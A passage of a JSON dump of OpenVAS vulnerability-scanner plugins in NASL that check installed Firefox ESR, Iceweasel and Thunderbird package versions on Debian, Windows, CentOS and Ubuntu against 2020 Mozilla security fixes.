isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-ca\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:02:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.", "modified": "2020-07-16T00:00:00", "published": "2020-07-02T00:00:00", "id": "OPENVAS:1361412562310817212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817212", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates (Windows)-June 30 2020 ", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817212\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\",\n \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-02 11:52:59 +0530 (Thu, 02 Jul 2020)\");\n script_name(\"Mozilla Firefox ESR Security Updates (Windows)-June 30 2020 \");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Memory corruption due to missing sign-extension for ValueTags on ARM64.\n\n - Information disclosure due to manipulated URL object.\n\n - Use-after-free in nsGlobalWindowInner.\n\n - Use-After-Free when trying to connect to a STUN server.\n\n - Add-On updates did not respect the same certificate trust rules as software updates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to conduct a denial-of-service or out-of-bounds read on affected system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 68.10 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 68.10\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-25/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE) )\n exit( 0 );\n\nffVer = infos[\"version\"];\nffPath = infos[\"location\"];\n\nif(version_is_less(version:ffVer, test_version:\"68.10\")) {\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"68.10\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:04:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-16T00:00:00", "published": "2020-07-09T00:00:00", "id": "OPENVAS:1361412562310883260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883260", "type": "openvas", "title": "CentOS: Security Advisory for firefox (CESA-2020:2827)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883260\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-09 03:00:49 +0000 (Thu, 09 Jul 2020)\");\n script_name(\"CentOS: Security Advisory for firefox (CESA-2020:2827)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2020:2827\");\n script_xref(name:\"URL\", value:\"https://lists.centos.org/pipermail/centos-announce/2020-July/035774.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the CESA-2020:2827 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n * Mozilla: Memory corruption due to missing sign-extension for ValueTags on\nARM64 (CVE-2020-12417)\n\n * Mozilla: Information disclosure due to manipulated URL object\n(CVE-2020-12418)\n\n * Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n * Mozilla: Use-After-Free when trying to connect to a STUN server\n(CVE-2020-12420)\n\n * Mozilla: Add-On updates did not respect the same certificate trust rules\nas software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS7\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~68.10.0~1.el7.centos\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:03:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12406", "CVE-2020-12398", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12410", "CVE-2020-12405", "CVE-2020-12420", "CVE-2020-12399", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-21T00:00:00", "published": "2020-07-09T00:00:00", "id": "OPENVAS:1361412562310844495", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844495", "type": "openvas", "title": "Ubuntu: Security Advisory for thunderbird (USN-4421-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844495\");\n script_version(\"2020-07-21T08:11:15+0000\");\n script_cve_id(\"CVE-2020-12405\", \"CVE-2020-12406\", \"CVE-2020-12410\", \"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12398\", \"CVE-2020-12399\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-09 03:00:24 +0000 (Thu, 09 Jul 2020)\");\n script_name(\"Ubuntu: Security Advisory for thunderbird (USN-4421-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU19\\.10|UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS|UBUNTU20\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4421-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-July/005509.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the USN-4421-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target 